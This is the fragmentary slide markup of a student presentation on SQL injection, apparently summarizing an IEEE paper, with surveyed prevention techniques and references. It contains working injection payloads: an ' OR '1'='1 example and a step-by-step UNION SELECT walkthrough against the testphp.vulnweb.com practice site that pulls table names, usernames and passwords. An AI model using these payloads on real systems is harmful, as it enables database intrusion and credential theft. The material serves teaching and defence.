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76a1e7d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b76a1e7df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a23a8149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a23a8149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a21eed26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a21eed26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9f96a1c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9f96a1c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9f96a1c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9f96a1c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a21eed26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a21eed26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23a8149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a23a8149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9f96a1c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9f96a1c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a21eed26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a21eed26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21eed26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a21eed26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a21eed26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a21eed26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21eed26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21eed26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a23a814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a23a814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23a814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23a814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9f96a1c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9f96a1c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a21eed26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a21eed26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a23a8149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a23a8149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a23a8149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a23a8149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a21eed26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a21eed26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a23a8149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a23a8149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eeexplore.ieee.org/document/9071133/#" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SQL_injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=&amp;cad=rja&amp;uact=8&amp;ved=2ahUKEwjLue2mjcfvAhWGcn0KHe79CRgQFjALegQIKxAD&amp;url=https%3A%2F%2Ftools.kali.org%2Fvulnerability-analysis%2Fsqlmap&amp;usg=AOvVaw3FB17bfryORq39VuYNx-S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estphp.vulnweb.com/artists.php?artist=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4404000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36325" y="706450"/>
            <a:ext cx="686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428750" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="1289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Database SQL Injection Security Problem Handling With Examples</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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428750" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="1289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b="1" sz="2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00050" lvl="0" marL="1428750" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="1289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By Carol V G &amp; Gwang Jung</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="21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53850" y="3619050"/>
            <a:ext cx="2974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13100" y="4536200"/>
            <a:ext cx="418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1911004 - Nidhi Bhanushali</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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97450" y="4560975"/>
            <a:ext cx="18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RDBMS IA-1</a:t>
            </a:r>
            <a:endParaRPr b="1"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SQL Injection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e) 	To retrieve the values in the uname column: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-2 union select 1,2,group_concat(uname) from users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f) 	To retrieve the values in the password of the uname : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-2 union select 1,2,group_concat(pass) from users</a:t>
            </a:r>
            <a:endParaRPr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223100"/>
            <a:ext cx="8368200" cy="7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&amp; Prevention Methods for SQL Attacks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326150"/>
            <a:ext cx="8368200" cy="141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CANDID (Candidate evaluation for Discovering Intent Dynamically) checks the data input in with the query structure the programmer wrote for the application.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96600" y="2937375"/>
            <a:ext cx="8368200" cy="109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JDBC (Java Database Connectivity) checker uses Java APIs. JDBC uses the type mismatches in a dynamically generated query string to prevent SQLI attacks. If SQLI attacks are detected, they are reported during the run time.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87900" y="223100"/>
            <a:ext cx="8368200" cy="7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&amp; Prevention Methods for SQL Attacks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7900" y="1326150"/>
            <a:ext cx="8368200" cy="141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SAFELI (Static Analysis Framework for discovering SQL Injection), identifies the SQLIA during compile time not at run time. It uses white-box static analysis , reviewing the code in order to find out if there are any possible defect in the code, SAFELI approach considers the byte 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396600" y="2937375"/>
            <a:ext cx="8514600" cy="141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DOM - SQLI prevention technique, uses manual defense coding practice . It is a set of classes that check the application for any syntax errors &amp; data type mismatches that can be inserted by the potential hacker and sent to the database. SQL DOM performs data type validation at compile time.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87900" y="223100"/>
            <a:ext cx="8368200" cy="7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&amp; Prevention Methods for SQL Attacks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7900" y="1326150"/>
            <a:ext cx="8368200" cy="141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STORED PROCEDURE is a SQLI attack prevention technique, helps web applications to interact with the back-end DBMS to perform operations on databases. Using stored procedures, dynamic queries with parameters can prevent SQLI attacks.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396600" y="2937375"/>
            <a:ext cx="8368200" cy="173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AHO-CORASICK pattern matching algorithm is used for detecting and preventing SQLI attacks. It consists of static and dynamic phases. If a new query statement is executed it will apply the AHO-CORASICK pattern matching algorithm again to check if any defect is detected by static and dynamic phases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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQLI Prevention Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Examples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988" y="1489825"/>
            <a:ext cx="42386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SQLI Prevention Code Examples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700" y="1628213"/>
            <a:ext cx="356235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75" y="1436813"/>
            <a:ext cx="35052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SQLI Prevention Code Examples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25" y="1611225"/>
            <a:ext cx="4473219" cy="29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87900" y="1301500"/>
            <a:ext cx="83682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SQLI attacks are most popular attacks to backend DBMS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Discover SQL Injection vulnerabilities in Web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the Mentioned Algorithm &amp; Techniques to check for Data Breach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Refrain From Using Dynamic SQL Queries Whenever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Appropriate Technology and Frameworks When Developing Your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Updates and Patches Regularly to Your Applications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for Implementation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 PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JDBC SQL Injection Prevention Code with Queries for Updation &amp; Deletion too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SQL Views for DBMS Data Security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AHO CORASICK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87900" y="1489825"/>
            <a:ext cx="8483100" cy="3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Database SQL Injection Security Problem Handling with Examples IEEE Paper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https://en.wikipedia.org/wiki/SQL_injection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C. Gould, Z. Su, &amp; P. Devanbu, “JDBC checker: a static analysis tool for SQL/JDBC applications”. 26th ICSE , pp. 697- 698, May 2004. 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SQLmap Kali Linux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L. Shar, H. Beng, and K. Tan, “Defeating SQL injection”. IEEE Computer, vol 46. Issue 3, pp. 69-77, 2013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M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prabhakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, M. KarthiKeyan, and K. Marimuthu, "An efficient technique for preventing SQL injection attack using pattern matching algorithm,".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87900" y="1489825"/>
            <a:ext cx="83682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Cyber Attacks have increased &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>poses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> huge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to Data stored in DBMS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 DBMS which manages Data using SQL , Hackers use SQL Injection to access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Hackers can access Sensitive Data like Credit Card No , Password , Information about Database Schema , or  gain Administrative access too.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90250" y="526350"/>
            <a:ext cx="8210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425" y="953150"/>
            <a:ext cx="6477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 Attack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5"/>
            <a:ext cx="8368200" cy="15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injection - code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.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					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300" y="107475"/>
            <a:ext cx="2400575" cy="12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446175" y="3259625"/>
            <a:ext cx="8310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 -  	 &lt; ' OR '1'='1&gt;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DBMS  - 	SELECT * FROM users WHERE name = ' ' OR '1'='1';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Attacks Shown in Paper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>
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Vulnerable Website Attack using Kali Linux SQLMap Application Tool</a:t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Slab"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Manual SQL Injection</a:t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Website Attack using Kali Linux SQLMap Application Tool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Kali Linux sqlmap is an application tool used to attack a target website to access Data from the back-end MySQL DBMS.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to find the database name. There are several commands to get database table schema.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Website Attack using Kali Linux SQLMap Application Tool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also retrieves what GET parameter is injectable and where you can inject a SQL injection either in the WHERE or HAVING CLAUSE.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hackers can find the parameters that are vulnerable to attack on the website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Website Attack using Kali Linux SQLMap Application Tool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5"/>
            <a:ext cx="4929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Kali Linux, there is a hidden CSV (Comma Separated Value) file that stores the data values of these columns.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375" y="917150"/>
            <a:ext cx="3163825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SQL Injection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Manual attack is done based on a trial and hit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Steps 	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arenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Browser &amp; Open URL to perform SQLIA , at end add ‘   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="15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http://testphp.vulnweb.com/artists.php?artist=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr sz="1500" u="sng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arenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove ‘ &amp; add &lt;order by&gt; followed by a value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://test.php.vulweb.com/artists.php?artist=1 order by 3-- </a:t>
            </a:r>
            <a:endParaRPr sz="1500" u="sng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SQL Injection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958250"/>
            <a:ext cx="8368200" cy="28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c) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>To find the table name : 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/>
              <a:t>http://test.php.vulweb.com/artists.php?artist=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--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d) To find Column name :  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/>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name= “users”--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-11234"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394250" y="41650"/>
            <a:ext cx="3562350" cy="21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